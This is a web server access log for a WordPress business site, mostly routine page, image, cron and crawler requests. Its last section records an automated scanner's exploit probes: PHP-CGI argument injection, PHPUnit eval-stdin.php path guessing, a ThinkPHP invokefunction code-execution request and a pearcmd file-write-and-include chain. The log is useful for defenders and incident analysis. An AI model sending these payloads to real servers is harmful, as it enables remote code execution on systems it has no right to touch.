111.7.100.27 - - [15/Oct/2025:04:36:09 +0800] "GET /material.html HTTP/1.1" 200 6459 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.24 - - [15/Oct/2025:04:36:15 +0800] "GET /material.html HTTP/1.1" 304 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.27 - - [15/Oct/2025:04:36:17 +0800] "GET /2164/ HTTP/1.1" 200 23818 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.26 - - [15/Oct/2025:04:36:17 +0800] "GET /services/ HTTP/1.1" 200 25527 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.25 - - [15/Oct/2025:04:36:19 +0800] "GET /2164/ HTTP/1.1" 200 23818 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.25 - - [15/Oct/2025:04:36:33 +0800] "GET /2164/ HTTP/1.1" 304 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.24 - - [15/Oct/2025:04:36:33 +0800] "GET /wp-content/uploads/2025/07/1753410289-News2000%C3%97400_202571.webp HTTP/1.1" 200 17830 "http://cqqizhou.com/2164/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.24 - - [15/Oct/2025:04:36:34 +0800] "GET /wp-content/uploads/2025/07/1753454089-Article_images_W900px.webp HTTP/1.1" 200 27552 "http://cqqizhou.com/2164/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.25 - - [15/Oct/2025:04:36:34 +0800] "GET /wp-content/uploads/2025/07/1753454089-Article_images_W900px-150x150.webp HTTP/1.1" 200 5292 "http://cqqizhou.com/2164/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.25 - - [15/Oct/2025:04:36:34 +0800] "GET /wp-content/uploads/2025/07/1753455746-DSC01472-150x150.webp HTTP/1.1" 200 4760 "http://cqqizhou.com/2164/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.26 - - [15/Oct/2025:04:36:37 +0800] "GET /wp-content/uploads/2025/07/1751425283-qizhou.kf_.qq_.com_.webp HTTP/1.1" 200 16864 "http://cqqizhou.com/2164/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
43.157.153.236 - - [15/Oct/2025:04:38:08 +0800] "GET /wp-content/uploads/2025/06/1750755307-qizhoucangku2000x400_2025624.webp HTTP/1.1" 200 45470 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [15/Oct/2025:04:39:14 +0800] "POST /wp-cron.php?doing_wp_cron=1760474354.0014679431915283203125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
20.171.207.2 - - [15/Oct/2025:04:39:14 +0800] "GET /wp-sitemap.xml HTTP/1.1" 501 253 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
36.133.115.36 - - [15/Oct/2025:04:50:41 +0800] "POST /wp-cron.php?doing_wp_cron=1760475041.3804969787597656250000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.6 - - [15/Oct/2025:04:50:41 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [15/Oct/2025:04:51:02 +0800] "POST /wp-cron.php?doing_wp_cron=1760475062.0827810764312744140625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.130.40.120 - - [15/Oct/2025:04:51:02 +0800] "GET /wp-json/oembed/1.0/embed?url=http%3A%2F%2Fcqqizhou.com%2F2165%2F HTTP/1.1" 200 1232 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [15/Oct/2025:04:53:38 +0800] "POST /wp-cron.php?doing_wp_cron=1760475218.7475159168243408203125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.93 - - [15/Oct/2025:04:53:39 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
111.7.100.24 - - [15/Oct/2025:04:53:54 +0800] "GET /about/ HTTP/1.1" 200 30090 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.25 - - [15/Oct/2025:04:53:54 +0800] "GET /about/ HTTP/1.1" 200 30090 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.25 - - [15/Oct/2025:04:54:03 +0800] "GET /wp-content/uploads/2025/07/1750671800-partner1_200x50.webp HTTP/1.1" 200 2244 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.24 - - [15/Oct/2025:04:54:03 +0800] "GET /wp-content/uploads/2025/07/1750649803-qizhou800x500_2.webp HTTP/1.1" 200 63616 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.26 - - [15/Oct/2025:04:54:03 +0800] "GET /wp-content/uploads/2025/07/1750945417-honor300%C3%97206_1.webp HTTP/1.1" 200 57666 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.26 - - [15/Oct/2025:04:54:03 +0800] "GET /wp-content/uploads/2025/07/1750945444-honor300%C3%97206_2.webp HTTP/1.1" 200 71296 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.26 - - [15/Oct/2025:04:54:04 +0800] "GET /wp-content/uploads/2025/07/1750671801-partner2_200x50.webp HTTP/1.1" 200 3946 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.24 - - [15/Oct/2025:04:54:04 +0800] "GET /wp-content/uploads/2025/07/1750671803-partner3_200x50.webp HTTP/1.1" 200 4414 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.26 - - [15/Oct/2025:04:54:04 +0800] "GET /wp-content/uploads/2025/07/1750671805-partner4_200x50.webp HTTP/1.1" 200 2390 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.25 - - [15/Oct/2025:04:54:04 +0800] "GET /about/ HTTP/1.1" 304 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.25 - - [15/Oct/2025:04:54:04 +0800] "GET /wp-content/uploads/2025/07/1750671806-partner5_200x50.webp HTTP/1.1" 200 2840 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.27 - - [15/Oct/2025:04:54:04 +0800] "GET /wp-content/uploads/2025/07/1750671808-partner6_200x50.webp HTTP/1.1" 200 3004 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.25 - - [15/Oct/2025:04:54:04 +0800] "GET /wp-content/uploads/2025/07/1751425283-qizhou.kf_.qq_.com_.webp HTTP/1.1" 200 16864 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.26 - - [15/Oct/2025:04:54:04 +0800] "GET /wp-content/uploads/2025/06/1750755307-qizhoucangku2000x400_2025624.webp HTTP/1.1" 200 45470 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.26 - - [15/Oct/2025:04:54:06 +0800] "GET /wp-content/uploads/elementor/thumbs/1751373145-About_Qizhoudalou_W800px-r91b70ok8huvvdr4ynxnf302e8ie3iydlh6ag9ew82.webp HTTP/1.1" 200 37938 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.27 - - [15/Oct/2025:04:54:06 +0800] "GET /wp-content/uploads/elementor/thumbs/1751209300-Hello-Qizhou3-r91b71mdtei8mab1rr8x739cnvi1mafuaga3vbed3o.webp HTTP/1.1" 200 39120 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.24 - - [15/Oct/2025:04:54:07 +0800] "GET /wp-content/uploads/2025/07/1750945514-honor300%C3%97206_3.webp HTTP/1.1" 200 74124 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.26 - - [15/Oct/2025:04:54:07 +0800] "GET /wp-content/uploads/2025/07/1750945637-honor300%C3%97206_5.webp HTTP/1.1" 200 77368 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.27 - - [15/Oct/2025:04:54:07 +0800] "GET /wp-content/uploads/2025/07/1750945616-honor300%C3%97206_4.webp HTTP/1.1" 200 33814 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.25 - - [15/Oct/2025:04:54:07 +0800] "GET /wp-content/uploads/2025/07/1750945650-honor300%C3%97206_6.webp HTTP/1.1" 200 66306 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.26 - - [15/Oct/2025:04:54:09 +0800] "GET /2160/ HTTP/1.1" 200 30012 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.27 - - [15/Oct/2025:04:54:10 +0800] "GET /2160/ HTTP/1.1" 200 30012 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.24 - - [15/Oct/2025:04:54:11 +0800] "GET /wp-content/uploads/2025/07/1753454299-Article_images_W900px.webp HTTP/1.1" 200 52418 "http://cqqizhou.com/2160/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.26 - - [15/Oct/2025:04:54:11 +0800] "GET /wp-content/uploads/2025/07/1753454089-Article_images_W900px-150x150.webp HTTP/1.1" 200 5292 "http://cqqizhou.com/2160/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.24 - - [15/Oct/2025:04:54:11 +0800] "GET /wp-content/uploads/2025/07/1753454089-Article_images_W900px.webp HTTP/1.1" 200 27552 "http://cqqizhou.com/2160/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.27 - - [15/Oct/2025:04:54:11 +0800] "GET /wp-content/uploads/2025/07/1751425283-qizhou.kf_.qq_.com_.webp HTTP/1.1" 200 16864 "http://cqqizhou.com/2160/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.27 - - [15/Oct/2025:04:54:11 +0800] "GET /wp-content/uploads/2025/07/1753410289-News2000%C3%97400_202571.webp HTTP/1.1" 200 17830 "http://cqqizhou.com/2160/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
36.133.115.36 - - [15/Oct/2025:04:55:54 +0800] "POST /wp-cron.php?doing_wp_cron=1760475354.6478230953216552734375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.90 - - [15/Oct/2025:04:55:54 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.157.153.236 - - [15/Oct/2025:04:58:50 +0800] "GET /wp-content/uploads/2025/07/1753455746-DSC01472-300x169.webp HTTP/1.1" 200 9040 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [15/Oct/2025:05:00:56 +0800] "POST /wp-cron.php?doing_wp_cron=1760475656.7186839580535888671875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.91 - - [15/Oct/2025:05:00:57 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [15/Oct/2025:05:03:41 +0800] "POST /wp-cron.php?doing_wp_cron=1760475821.3716809749603271484375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
111.172.249.49 - - [15/Oct/2025:05:03:41 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
111.172.249.49 - - [15/Oct/2025:05:03:42 +0800] "GET / HTTP/1.1" 200 33466 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [15/Oct/2025:05:06:11 +0800] "POST /wp-cron.php?doing_wp_cron=1760475971.1355609893798828125000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
93.123.109.214 - - [15/Oct/2025:05:06:11 +0800] "GET / HTTP/1.1" 301 5 "-" "l9tcpid/v1.1.0"
43.157.170.13 - - [15/Oct/2025:05:07:43 +0800] "GET /wp-content/uploads/2025/07/1751864664-Logistics800x500_1-768x480.webp HTTP/1.1" 200 83946 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [15/Oct/2025:05:19:03 +0800] "POST /wp-cron.php?doing_wp_cron=1760476743.8165359497070312500000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
101.33.66.34 - - [15/Oct/2025:05:19:03 +0800] "GET /wp-json/oembed/1.0/embed?url=http%3A%2F%2Fcqqizhou.com%2Fclub%2F HTTP/1.1" 200 1109 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
111.7.100.24 - - [15/Oct/2025:05:20:33 +0800] "GET /contacts/ HTTP/1.1" 200 21517 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.26 - - [15/Oct/2025:05:20:33 +0800] "GET /contacts/ HTTP/1.1" 200 21517 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.27 - - [15/Oct/2025:05:20:37 +0800] "GET /wp-content/uploads/2025/06/1750674554-qizhoudalou2000x400_2025624.webp HTTP/1.1" 200 47874 "http://cqqizhou.com/contacts/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.24 - - [15/Oct/2025:05:20:39 +0800] "GET /contacts/ HTTP/1.1" 304 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.26 - - [15/Oct/2025:05:20:39 +0800] "GET /wp-content/uploads/2025/07/1751425283-qizhou.kf_.qq_.com_.webp HTTP/1.1" 200 16864 "http://cqqizhou.com/contacts/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.26 - - [15/Oct/2025:05:20:39 +0800] "GET /wp-content/uploads/2025/07/1750005875-qizhou_map2025616.webp HTTP/1.1" 200 348798 "http://cqqizhou.com/contacts/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.26 - - [15/Oct/2025:05:20:40 +0800] "GET /wp-content/uploads/2025/07/1750005875-qizhou_map2025616.webp HTTP/1.1" 206 1 "http://cqqizhou.com/contacts/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
36.133.115.36 - - [15/Oct/2025:05:20:40 +0800] "POST /wp-cron.php?doing_wp_cron=1760476840.9453270435333251953125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
111.7.100.24 - - [15/Oct/2025:05:20:41 +0800] "GET /wp-json/contact-form-7/v1/contact-forms/158/feedback/schema HTTP/1.1" 200 358 "http://cqqizhou.com/contacts/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.24 - - [15/Oct/2025:05:20:41 +0800] "GET /wp-content/uploads/2025/07/1750005875-qizhou_map2025616.webp HTTP/1.1" 206 280442 "http://cqqizhou.com/contacts/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
111.7.100.24 - - [15/Oct/2025:05:20:41 +0800] "GET /wp-json/contact-form-7/v1/contact-forms/158/refill HTTP/1.1" 200 33 "http://cqqizhou.com/contacts/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
36.133.115.36 - - [15/Oct/2025:05:21:25 +0800] "POST /wp-cron.php?doing_wp_cron=1760476884.9756579399108886718750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
101.36.107.228 - - [15/Oct/2025:05:21:25 +0800] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 31381 "-" "libredtail-http"
101.36.107.228 - - [15/Oct/2025:05:21:26 +0800] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 151919 "-" "libredtail-http"
101.36.107.228 - - [15/Oct/2025:05:21:26 +0800] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
101.36.107.228 - - [15/Oct/2025:05:21:27 +0800] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
101.36.107.228 - - [15/Oct/2025:05:21:27 +0800] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
101.36.107.228 - - [15/Oct/2025:05:21:27 +0800] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
101.36.107.228 - - [15/Oct/2025:05:21:27 +0800] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
101.36.107.228 - - [15/Oct/2025:05:21:28 +0800] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
101.36.107.228 - - [15/Oct/2025:05:21:28 +0800] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
101.36.107.228 - - [15/Oct/2025:05:21:28 +0800] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
101.36.107.228 - - [15/Oct/2025:05:21:29 +0800] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
101.36.107.228 - - [15/Oct/2025:05:21:29 +0800] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
101.36.107.228 - - [15/Oct/2025:05:21:29 +0800] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
101.36.107.228 - - [15/Oct/2025:05:21:30 +0800] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
101.36.107.228 - - [15/Oct/2025:05:21:30 +0800] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
101.36.107.228 - - [15/Oct/2025:05:21:30 +0800] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
101.36.107.228 - - [15/Oct/2025:05:21:31 +0800] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
101.36.107.228 - - [15/Oct/2025:05:21:31 +0800] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
101.36.107.228 - - [15/Oct/2025:05:21:31 +0800] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
101.36.107.228 - - [15/Oct/2025:05:21:31 +0800] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
101.36.107.228 - - [15/Oct/2025:05:21:32 +0800] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
101.36.107.228 - - [15/Oct/2025:05:21:32 +0800] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
101.36.107.228 - - [15/Oct/2025:05:21:32 +0800] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
101.36.107.228 - - [15/Oct/2025:05:21:33 +0800] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
101.36.107.228 - - [15/Oct/2025:05:21:33 +0800] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
101.36.107.228 - - [15/Oct/2025:05:21:33 +0800] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
101.36.107.228 - - [15/Oct/2025:05:21:33 +0800] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
101.36.107.228 - - [15/Oct/2025:05:21:33 +0800] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
101.36.107.228 - - [15/Oct/2025:05:21:34 +0800] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
101.36.107.228 - - [15/Oct/2025:05:21:34 +0800] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
101.36.107.228 - - [15/Oct/2025:05:21:34 +0800] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
101.36.107.228 - - [15/Oct/2025:05:21:34 +0800] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
101.36.107.228 - - [15/Oct/2025:05:21:35 +0800] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
101.36.107.228 - - [15/Oct/2025:05:21:35 +0800] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
101.36.107.228 - - [15/Oct/2025:05:21:35 +0800] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
101.36.107.228 - - [15/Oct/2025:05:21:36 +0800] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
101.36.107.228 - - [15/Oct/2025:05:21:36 +0800] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
101.36.107.228 - - [15/Oct/2025:05:21:37 +0800] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
101.36.107.228 - - [15/Oct/2025:05:21:37 +0800] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
101.36.107.228 - - [15/Oct/2025:05:21:38 +0800] "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 200 64806 "-" "libredtail-http"
101.36.107.228 - - [15/Oct/2025:05:21:38 +0800] "GET /public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 27 "-" "libredtail-http"
101.36.107.228 - - [15/Oct/2025:05:21:39 +0800] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php HTTP/1.1" 200 151919 "-" "libredtail-http"
101.36.107.228 - - [15/Oct/2025:05:21:41 +0800] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 200 151919 "-" "libredtail-http"
